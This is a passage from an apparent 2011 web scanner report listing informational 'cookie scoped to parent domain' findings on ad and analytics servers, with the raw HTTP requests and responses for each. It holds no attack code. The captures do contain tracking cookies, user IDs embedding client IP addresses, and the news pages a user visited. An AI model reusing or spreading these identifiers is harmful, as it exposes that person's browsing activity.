VeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_pcmJ="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjCvxKBGnNieprsaqAEBSpAsXkCPkTX0nxsBiWalfewKcJK8Vc/VW9/VjSEysooOkVzr/RWSQ7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENWF0WHX0pHjFhiyz8iM1hcftVO/mv2Gym6f1ixYIEoxWjZmugIrdOCa6jtlrwynaN2daFJSG+cHccCyeSSyqxFOdB7JO2qgvGJDILfWUHh4m+MSIEwdZyOpUONprjPGRiDXeoV1GN0HGmkDh71ptqIE73Slzx2ocQ3YWHZlgdaSTx6N9Gq1RdiCIjiwCxNpfVfSbErbPGn574X+YJwM0jly8qtYbEd8z2azKrl1r8U2xmmJk1Ut6fe1GyCQFMttbbqeDiSzU461AonI7qdnrF2j/+PzRXsh1X7BAxKCpTl2svSiaq0tTDa0zhuGMZGUOWewfuXATBKa0+HjymcOZXXg8mGLSvVmp/jMUCL6Hycpp8Heq2GfkJqmKJgynAhhT77HToysfn9n/8XqrPP3HCthiRFLZpOOTnBksJffeZmXGUAidwIVT4k0/Gah9U7VbqpOtiSYCYU4Yc8shojQKKPyiHgobQdVoozcpIHrCRoDDB+YGYmEhaulfXopicXxpSijZkV5JDPVmCP0dTfIGUIXXlsIH4QLHr5ybR2AtT29aq9li+t5BiXsqfDEojsRMq/Ygtk6OJvRVFcPu1JfdimNHGlFu87wDQ49K/8wLu5+IjJD8Lia5fRfiCwHyzBRT0tHMUBiPA18FS0OXs+6XYjcEcKIV9D9ynNJiwVb1M8S0L4TrR9L+n8qMcNqdXcvWbUDRQlEyi+nuJrqeeMAqFO5lDH6Opqdvvtxg7VWa6OwiiotH1KPT8awCgQVj9uG6fuofnYz6+ZgvA3nQrZ75NA1GYyZQPCYKxogsGppT39axp+alRTT1DD3DgY+aTnrDH4/x+G6ec/46zILCP5wLT0IyYbruzQ3K1lN0PclKCIGZJV8wEDT67c3S5t+iXoDTDwE"; rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Trj7P+Kw7EY+8nG6l7281jI/Twsp6FvJuxkedavN124ASJwVH5lHOqaC4o2fHK9QkQegr9yV3a1uS0XBRr+UjUJn3jbPtGSbFgtYHM6diK2a0NjjkRkuTSEj1KpKAhX6AZ1R1E/1mhgQQAGO6Ey+i60pJwoxL3P90aEwTDtF60ZrAr2oVSSkT53eZtaPmd04KSPJCji5aopxLklNZS/GiatoZ2jphGx2z1EXHlaH+CR99JCv3peL4/lsLBtiSo+43CIgl+uX+ehgA5bfpaMyTvjWqfMxG+YXpRB7oJvzVfJ1hAJB1fCxIe3BSPIhvIXg5w61OSBX96dEvqaOfQgXdLrYKu2TTqz1r49jDR0udHJkV58ovuVKNAQzYsIUkpudNMqvuS5rii5vasRjCyBbjuTZUI+ke75OMy75W1xZVCyxCOZvMLmxTUJXbZV8GzCE7lMDc3+zvE5V5IvbS5CsrnTj6ybSguJ+omQctAgniJFUozrkBZ1OIl5GLrwquW4JyHLRLAASEkCIgrjlKwH+eTKuYt0xO6ZRLXFJLAYwbNouVUSKXdm1/7rLyVlyqAb6l32+WOPCnh2bleryXHWUjO5ptGRoXtN/XsvNR5nqF5qOnaE7QN47lsTZYheDGqu5vx/TX9i8WWYdAEea18RNQgalGMmpUnwkr0XJxxkS9pOZY+nMDWO9YPnqV4L1M+jNcOrMDy5W7bFAzGFtBsQLQxTBMB8CQhsjSXE8EFGWtYAGcqgQrWLcFUAHv2YstIikpMJAHTcpd//ChyQksxgwRI/xDTP/UX8sl81am2u/l72M+kC3NYxyLlqbMQygHhC5xbzBLAz8uP5C8vlPRfNyTcmE0bjY/a4mx+MRhAyxr6EbW0PRTjcT9i1HqlvgHmTxKMoWqoDQUrJL0iSjFdVid/A10rFa2odEqrwGdImt2VkyF2FkvhrMrEPZ+oemlCYh57OAQpLcngarZUVMEBAbLnzayJNE1icdui+MToGdBHC8eA7SXFoiWvid4PrK32gS7iye9h3wQDCsKNPfiEGx+afiTdHusAdAnDb8v9Rj1kslJs26tYCN4jl0bmJ1JpEKWFHZSQJ/T/aq+8F84c4uJ2mgjExwD8ib+0M+W0SZksWnH/1693rN6KkLzl4u+xkRT9q33JjB7wW0GsiI6E17aBu49cXOoC0HjIZBvQaM9rIoqtmgwjToNtIcg952Cbwvin7A2nXH2BvmVnx4ucA2Wvn0J8cV8hZZDNaDUTbY219bW1E/kMSjSTfnagaQoW1WXUJr21Bl5LZcARkW7d1ksv8v4X3BZps89ZMu/Vz+sNEuFQY4vL6GJK6YPH/0/l8sx1s4x7GPq1/skLvz121KrQObQeVNJb0CkKyIYPH5XBeDt3iXpMBeWLxrFuVx0g7ItcCA+baO+p4dVI0vQ9Zr+V+MRO5Exbcu/249PljXdXc7EPtp9D9+w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdqU="MLsXrqMOJjhroJB0OsFGPziNFPNiuow9UdSaSv9RjdiZuXcB7hqs6EdLVaX9FhqxzXqzJywn1Cj9nLMFQzefSGFEY+rjaCpJRiAiYGi2DHp0tKU8XQcGSHbS+Dk+qovgQTwR+gpKV0oPK0JkzzcKhOF8o7uE6oO9qh80lZ7Xel6NGtgbwjrgJduiM51PaIPd2BJyFdQZAmkNyOhm5cP71nYVyV9KaVPcBA50HnoWW6+k3Dxhr0zTbpCBHUllWtx6aRVDYGeZk9K7ZL0hTHKvncsHLsCLYHCvmD5Ycv7VVDV00zYJINWzu3CPrbB4IYAjXW3vj4rsblu54yLA1Dc6Y6gCuHKV5SZsUi4uGiBdtBhhocEPOnIejFhsR3rbY6GJtx4ihgHWbiCsghdvgegfdGd/5qYgmedE5PSbM1ADhrKGZ3SCY44HJIJRGGazmJrBKNn5LEoHx4MRcKmq7CTYjhtBIgVi8n0cQcFNme1bNmPWFKcqoVnAUSJpJgBqXFQ5wx7qH4gDYPya9+buKMK9+ekcnzt54NYfTnI7jAxwnCpWq+kJd0Yw543TIHZ5i0gxUC/IPGc6mxdWiKg4RHEO3L0otALBdNCwOFAiSK1bdi0nXrtknR3MMXhwwfPIzPaLXM+akKWNJAIcSh4PhAOFvqTKuFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/uuiZWRcF2CeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM3hYFUuM+b7FSC9tA/os4G3yWCotYZVrGvo54nzTqbUBprWjuZeCEFOQrhk39gvmKqik9/KpfzR5MiU0uLqBg4fajyELacRAGLnVGj+B7iteW8WMZEjeKmXBe07ucZRi9DpGErPDw6oq7W48eIvXekP4IC+FWJCPqTlvpuRnGVHMAgc2N/10uzlwIFyZU8xlBrKB09h8MsfXUFU/XriyVQk0iV2aXQykGDbTt7wXEZjVdp8Bg+8v79AqGFZFXHkpC6EnFo3jp0YNfEdmA+TtNo4qTVSUwILsHfJ1xPZDLAcyQmTDKNHxhrA2TUZakdD+b7KfaafZcpU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1Iz9DOAYU1O2uA3Nf1wgg9Trn7P8K47EY+8nGql72A9rNu/WP+Yp2mpPygxIFQc/rlHGwyyG/2blenQfm1l0Q/iLSAjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5Ym5SS9akNrDlJkuTSEn1IzCzNjTywhnuZUD6LuLDI3Ub7pnknRg6DioQwaQWBI/Va9H+E6oAGKDoOkdEsbTdiXG0YLDJupGOL941dnqjjKA/tKwUiQ7Bg46i/2PEgcQGrjtDE8cREmclCxlJWKsd/4kBe220QCtR33/i+YiYxNLl11a2NeHERuz0/wtyg4B7wVzAxIr328AFdyG3OqCrt9Bss8gOMdglG+O8aLkC+XqiolL2z3YHeAtnVDXa4KKw1We9htczQ58f1/MGFXbDVpPs6WVRGu3+d5TCcU7yxQ7gKSdcw2h8rucA3ek3ms9do7g2wGQ4IAl0I1cn81AaowmHyzYOIPg1PyT+l0xKJZCRqqjo5TgwgO+/kXhACxeQ4RidxA9oz43XdB0IlE4K2AJSfqvAUc58BhHAK7sr4HZCqkLhQZyPg6Ip8jRGVSo19MvkgnZBhVdfI7td9lONwXbAiqOv0dBu1WgT3NcllONTos4/mZzgzFRWAFJvLRjBK0+6yBKRT+jieyboOkO+4xVqmrO/Ar4c5d1VTwLfBUF6D0BbDF0v9in35Iyo5OFSjJEB/0iMLPUVwhg35239Pd2hGJqg3X4ChYj/9Jzu9JzDnHq7XGQrhxR8hKZ9JsITQzwaf5Xp6L8CNvTM00skMxn4v0QN7OGYbiYaTRjXbBUNsd2c1JMgWmRXYAtR85D+z9c0B+kkUwZJMx45+HuZTwl1h98Wq2Vi+88RWyLIdaA1uhqGjqUUcMk/8RcMY1ZZ7bVEpoFmKPNbbffta1Hulv8HmTh6N2aOHgQzAzNGsR/ASaN5OZRN8nlrQj/3mLqK3PdQk1JaD1suhpMvEv4Ws+llCQBn4hBGD95pgc9YrBnJuzbXkcZ2fl27dkzem+EToIdBHC8Zs7eTFoCWnuWAPo234gSrmyO9h3wUPisKJP/iEGx+ZfaTRHusAxojdHgBZPVWnLnRMX/rExKb/q4ZfNfP5NH51TLP2xA3CWZaUes4c4uanbkwKntqp+uPTxw5qcuNxucC7vSNbUDZ9Ta1LhiitrPGSUJ2Ecgzj2d3TweX8ooHTl1HAtb0MP+KOWuoiznt63sse8jznEqCjX17SaGm9KBL0GJkp8M48eGwyyDYKFz0T4ESopltkXESByivxh69cV+stDhcg/oSfXwJwaItp7vsYlaMKIcddAdFCTqStm6l0ZR/ZaptMbYpL+KDItRKCRg+ccHvfqWumbv3zd1vdAyvlbXrrVxrU+uOjODfHrD8UH59LhZ18ntVw6ZS1hK7sBKy7ylMiHbBXT1CLkbvZA3yEPXVaMMdZjWNwu+A71b+1/H++HXYjWpcXLYVJx244iFFdiwEgRlnZiXLKdra7LEUfrdN0fQYrx+BKmbzKrhCdqeEJcp09XrcwUjfKA"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:32 GMT

GIF89a.............!.......,...........D..;
9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH;cfp=1;rndc=130495000;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=213;misc=1304950001207 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adserver.adtech.de
Cookie: CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7F3676E651A260C6EAF39F01058B1;expires=Wed, 8 May 2013 14:7:47 GMT;domain=adtech.de;path=/
Content-Length: 1897

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
9.16. http://adserver.adtech.de/bind  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /bind

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=cookiename1;cvalue1=cookievalue1;expiresDays=90;adct=text/html;misc=123&_=1304949672673 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: cookiename1=cookievalue1;expires=Sun, 7 Aug 2011 14:3:53 GMT;domain=adtech.de;path=/

9.17. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain

9.18. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304949586.006,wait-%3E10000,&1304949587809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
9.19. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:45 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949585; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25690

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
9.20. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&rn=699931416&c7=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&c3=16&c4=0&c5=0&c15=541%252C1697%252C2354%252C2532%252C1443%252C2250&c16=LIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1&c8=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 14:00:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.21. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036462&d.c=gif&d.o=tribglobal&d.x=64109300&d.t=page&d.u=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:57 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 13:59:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
9.22. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=256163696&c4=206438267&c5=1&c6=39&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c9=&c10=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c15=&1304949586804 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
